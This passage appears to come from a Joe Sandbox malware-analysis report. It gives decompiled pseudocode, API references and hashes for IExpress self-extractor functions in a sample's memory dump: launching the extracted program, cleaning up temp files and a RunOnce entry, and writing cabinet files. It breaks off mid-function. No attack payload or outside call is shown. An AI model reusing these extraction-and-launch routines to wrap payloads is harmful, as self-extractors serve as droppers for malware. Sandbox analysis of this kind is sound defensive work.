Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
API String ID: 747627703-1860564779
Opcode ID: b7b0d8e901ba3b8c65eb3ce9583fbeb0fe80832ae5bde8c86b7a5c3cd9b5f861
Instruction ID: ce18606a5c6570ee9e483ceea67e2b5fe6083f9ca4fbdb0c1cb18440f83881f2
Opcode Fuzzy Hash: b7b0d8e901ba3b8c65eb3ce9583fbeb0fe80832ae5bde8c86b7a5c3cd9b5f861
Instruction Fuzzy Hash: E311263170C211ABDB307EBD5C4CA9B7E99DF86274B10066AB5C5D31C4CA79980687A0

Uniqueness

Uniqueness Score: -1.00%

Function 01083FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E01083FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E01086CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x1089124 = E01086285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
					_t45 = 0x4c4;
					E010844B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x1088a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x1089a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x1089a2c = _t44;
						}
					}
				}
				E0108411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x1089a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01083fef
0x01083ffa
0x01084001
0x01084008
0x0108400a
0x0108400b
0x01084010
0x0108410a
0x0108411a
0x0108411a
0x0108401c
0x0108401d
0x0108401e
0x0108401f
0x01084033
0x0108403b
0x010840ca
0x010840e9
0x010840f8
0x01084101
0x01084106
0x01084106
0x01084108
0x01084108
0x00000000
0x01084108
0x01084049
0x0108405c
0x01084062
0x01084068
0x0108406e
0x01084070
0x01084077
0x0108407f
0x01084089
0x0108408b
0x0108408b
0x01084089
0x01084077
0x01084091
0x0108409c
0x010840a8
0x010840b8
0x00000000
0x010840c2
0x00000000
0x010840c2

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 01084033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 01084049
GetExitCodeProcess.KERNELBASE ref: 0108405C
CloseHandle.KERNEL32(?), ref: 0108409C
CloseHandle.KERNEL32(?), ref: 010840A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010840DC
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010840E9

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: 537ba6522752bc518def5759ddbd66cb56ce0467ec1171b0df3cfe8d29caa8ce
Instruction ID: 08ec4d3e0cc6b0f8b6300f1bfed389a99687d588cfdf04fd3e81cfb646805e6d
Opcode Fuzzy Hash: 537ba6522752bc518def5759ddbd66cb56ce0467ec1171b0df3cfe8d29caa8ce
Instruction Fuzzy Hash: 8E31B331748209ABEF70AB65DC48FAFBBBCEB94704F1001AAF5C5D2151C6394881CF50

Uniqueness

Uniqueness Score: -1.00%

Function 010851E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E010851E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0108468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0108468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E010844B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x1089124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x1089124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E010844B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x1089124 = 0x80070714;
					goto L10;
				}
				E010844B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x1089124 = E01086285();
				goto L10;
			}

0x010851fb
0x01085207
0x0108520b
0x0108523c
0x01085268
0x01085270
0x0108528b
0x01085293
0x0108529c
0x010852a6
0x010852b0
0x00000000
0x010852b0
0x0108529e
0x01085279
0x00000000
0x0108527b
0x01085273
0x00000000
0x01085273
0x0108524a
0x01085250
0x01085256
0x00000000
0x01085256
0x01085219
0x01085223
0x00000000

APIs

Part of subcall function 0108468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010846A0
Part of subcall function 0108468F: SizeofResource.KERNEL32(00000000,00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846A9
Part of subcall function 0108468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010846C3
Part of subcall function 0108468F: LoadResource.KERNEL32(00000000,00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846CC
Part of subcall function 0108468F: LockResource.KERNEL32(00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846D3
Part of subcall function 0108468F: memcpy_s.MSVCRT ref: 010846E5
Part of subcall function 0108468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010846EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01082F4D,?,00000002,00000000), ref: 01085201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 01085250

Part of subcall function 010844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01084518
Part of subcall function 010844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 01084554

Part of subcall function 01086285: GetLastError.KERNEL32(01085BBC), ref: 01086285

Strings

UPROMPT, xrefs: 010851EF, 01085230
<None>, xrefs: 01085262

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: d09783f78a0f0e1e329f3ba1d34b53c1e27321195b4fd459fb78dfbc60975c3b
Instruction ID: df0547befb34573f3db6996dd8558ac872421d424093e6265ed3471d06589148
Opcode Fuzzy Hash: d09783f78a0f0e1e329f3ba1d34b53c1e27321195b4fd459fb78dfbc60975c3b
Instruction Fuzzy Hash: E111B2B170C202EFE7657BB55C88B7F71DEEBC97A4B00442EB6C2D6184DE7E98024624

Uniqueness

Uniqueness Score: -1.00%

Function 010852B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E010852B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x10891e0; // 0xd98468
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x1088a24 == 0 &&  *0x1089a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x1088a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x1088a24 == 0 &&  *0x1089a30 == 0) {
					_push(_t22);
					E01081781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
					if(( *0x1089a34 & 0x00000020) != 0) {
						E010865E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E01082390( &_v268);
					_t11 =  *0x1088a20; // 0x0
				}
				if( *0x1089a40 != 1 && _t11 != 0) {
					_t11 = E01081FE1(_t22); // executed
				}
				 *0x1088a20 =  *0x1088a20 & 0x00000000;
				return E01086CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x010852b6
0x010852b6
0x010852b6
0x010852c1
0x010852c8
0x010852cb
0x010852cc
0x010852d4
0x010852d6
0x010852d7
0x010852de
0x010852e0
0x010852f2
0x010852fa
0x010852fa
0x01085302
0x01085305
0x0108530c
0x01085312
0x01085316
0x01085316
0x01085317
0x0108531c
0x0108531f
0x01085333
0x01085345
0x01085351
0x01085359
0x01085359
0x01085363
0x01085369
0x0108536f
0x01085374
0x01085374
0x01085381
0x01085387
0x01085387
0x0108538f
0x010853a0

APIs

SetFileAttributesA.KERNELBASE(00D98468,00000080,?,00000000), ref: 010852F2
DeleteFileA.KERNELBASE(00D98468), ref: 010852FA
LocalFree.KERNEL32(00D98468,?,00000000), ref: 01085305
LocalFree.KERNEL32(00D98468), ref: 0108530C
SetCurrentDirectoryA.KERNELBASE(010811FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 01085363

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01085334

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 2833751637-2356899610
Opcode ID: e4566eff2e3a85986772ed84de70bc54e51a08db8203b6ff0c0e4f95c2d37287
Instruction ID: 1223ac9e6257897ca7ed4ae503ddbf991c247a5cbb665a2fec75cb22b65075c0
Opcode Fuzzy Hash: e4566eff2e3a85986772ed84de70bc54e51a08db8203b6ff0c0e4f95c2d37287
Instruction Fuzzy Hash: 1B219F3151C214DFEB71BB14D848BADBBF0AB44714F4481AAF9C257688CBBA5985CF80

Uniqueness

Uniqueness Score: -1.00%

Function 01081FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01081FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x1088530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x01081fee
0x01082005
0x0108200d
0x01082017
0x00000000
0x01082020
0x0108200d
0x01082029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0108538C,?,?,0108538C), ref: 01082005
RegDeleteValueA.KERNELBASE(0108538C,wextract_cleanup1,?,?,0108538C), ref: 01082017
RegCloseKey.ADVAPI32(0108538C,?,?,0108538C), ref: 01082020

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 01081FFB
wextract_cleanup1, xrefs: 01081FE7, 0108200F

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
API String ID: 849931509-1592051331
Opcode ID: 351e473057ac3e2447d60ec546a0539a662fe45458e688e621ab4f656bdd2ffa
Instruction ID: a4e74417168472763f5cf60ea20d927025d076a9dc8f4291ad36ea00020b2392
Opcode Fuzzy Hash: 351e473057ac3e2447d60ec546a0539a662fe45458e688e621ab4f656bdd2ffa
Instruction Fuzzy Hash: 24E0DF30A08308FBEB32AAD1EC0EF1D7B6AE700781F20018ABAC4A1505E7665A01DF10

Uniqueness

Uniqueness Score: -1.00%

Function 01084CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01084CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x1088004; // 0x4f5b7a6c
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x10891d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E01084E99(_t75);
						L35:
						return E01086CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x1088584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x10891e4;
						_t58 = 0x10891e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x10891e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x10891e4;
						_t30 = E01084702( &_v268, 0x10891e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0108476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E01084980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E010847E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x10893f4 =  *0x10893f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x10891e4;
						_t63 = 0x10891e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x10891e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x10891e4;
						_t30 = E01084702( &_v268, 0x10891e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E01084C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E01084B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E01084B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x01084cd0
0x01084cdb
0x01084ce0
0x01084ce2
0x01084cee
0x01084cf2
0x01084d0e
0x01084d0e
0x01084d11
0x01084e83
0x01084e88
0x01084e98
0x01084e98
0x01084d17
0x01084d17
0x01084d1a
0x01084d2f
0x01084d2f
0x00000000
0x01084d2f
0x01084d1c
0x01084d1c
0x01084d1f
0x01084dcb
0x01084dd0
0x01084dd2
0x01084ddd
0x01084ddd
0x01084de3
0x01084de8
0x01084ded
0x01084ded
0x01084def
0x01084df0
0x01084df0
0x01084df4
0x01084df4
0x01084df6
0x01084df9
0x01084dfc
0x01084dfc
0x01084dfe
0x01084dff
0x01084dff
0x01084e03
0x01084e08
0x01084e0a
0x01084e0f
0x01084d03
0x01084d03
0x00000000
0x01084d03
0x01084e18
0x01084e20
0x01084e25
0x01084e27
0x00000000
0x00000000
0x01084e33
0x01084e38
0x01084e3a
0x00000000
0x00000000
0x01084e40
0x01084e51
0x01084e56
0x01084e5b
0x01084e5e
0x00000000
0x00000000
0x01084e6a
0x01084e6f
0x01084e71
0x00000000
0x00000000
0x01084e77
0x01084e7d
0x00000000
0x01084e7d
0x01084d25
0x01084d25
0x01084d28
0x01084d36
0x01084d3b
0x01084d40
0x01084d40
0x01084d42
0x01084d43
0x01084d43
0x01084d47
0x01084d4a
0x01084d4a
0x01084d4c
0x01084d4f
0x01084d4f
0x01084d51
0x01084d52
0x01084d52
0x01084d56
0x01084d5b
0x01084d5d
0x01084d62
0x00000000
0x00000000
0x01084d67
0x01084d6f
0x01084d74
0x01084d76
0x00000000
0x00000000
0x01084d7c
0x01084d84
0x01084d89
0x01084d8b
0x00000000
0x00000000
0x01084d94
0x01084d99
0x01084d9e
0x01084da1
0x01084daa
0x01084daa
0x01084da3
0x01084da3
0x01084da3
0x01084db5
0x01084dbb
0x01084dbd
0x00000000
0x01084dc3
0x01084dc5
0x00000000
0x01084dc5
0x01084dbd
0x01084d2a
0x01084d2a
0x01084d2d
0x00000000
0x00000000
0x00000000
0x01084d2d
0x01084cf8
0x01084cfd
0x01084d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 01084DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 01084DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01084D36, 01084DE3

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 3625706803-2356899610
Opcode ID: 038bae2e7fe3cf3dc2bd1925b1eb84dea220f35c6582b34c50c00deb34148eda
Instruction ID: 665c9879bd6764e3b1de3b0b8eceaa7740b36b3a6e86dbeef6c2b789d422a7cd
Opcode Fuzzy Hash: 038bae2e7fe3cf3dc2bd1925b1eb84dea220f35c6582b34c50c00deb34148eda
Instruction Fuzzy Hash: EA41133620C6038BDB61BE2CD9447F97BE5EB45304F0486AAD8C2D7285DA32DA4AC750

Uniqueness

Uniqueness Score: -1.00%

Function 01084C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01084C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x1088d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x1088d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x01084c40
0x01084c4a
0x01084c8d
0x00000000
0x01084c70
0x01084c70
0x01084c7e
0x01084c86
0x00000000
0x00000000
0x00000000
0x01084c8a

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 01084C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01084C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 01084C7E

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: a6d21c8e6b71eba27e485e971c8c89019f1883b440d6b12acb3c4b8c7bd540f1
Instruction ID: 57da325f39dc2dfa491d900cdf74515f771d16d7db409edff003201769106476
Opcode Fuzzy Hash: a6d21c8e6b71eba27e485e971c8c89019f1883b440d6b12acb3c4b8c7bd540f1
Instruction Fuzzy Hash: B2F0627260820EAAABA4EEA8CC48ABF7BEDEB04240744457BB5D5C2400E635D514C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0108487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0108487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0108490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x01084880
0x0108488c
0x01084894
0x010848a0
0x010848c9
0x010848ce
0x010848a2
0x010848a8
0x010848b7
0x010848bc
0x010848aa
0x010848ac
0x010848ac
0x010848a8
0x010848de
0x010848e7
0x0108490b
0x010848ee
0x010848f0
0x00000000
0x01084902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,01084A23,?,01084F67,*MEMCAB,00008000,00000180), ref: 010848DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,01084F67,*MEMCAB,00008000,00000180), ref: 01084902

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 727580d4b3d19e178a1ace607ca2dd3263cda16a3cb61ac165d3a8106be8c68f
Instruction ID: 6e070e5f8493cf8fb93fafa9fba7d86f3755b0ca07102ea20b850611857a41f8
Opcode Fuzzy Hash: 727580d4b3d19e178a1ace607ca2dd3263cda16a3cb61ac165d3a8106be8c68f
Instruction Fuzzy Hash: 30016DA3E2997166F37460294C88FFB659CCBD6634F1B0335BEEAE71C1D5644C0482E0

Uniqueness

Uniqueness Score: -1.00%

Function 01084AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E01084AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x108858c; // 0x270
				_t9 = E01083680(_t20);
				if( *0x10891d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x1088d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x1089400; // 0x40200
							_t15 = _t14 + _t25;
							 *0x1089400 = _t15;
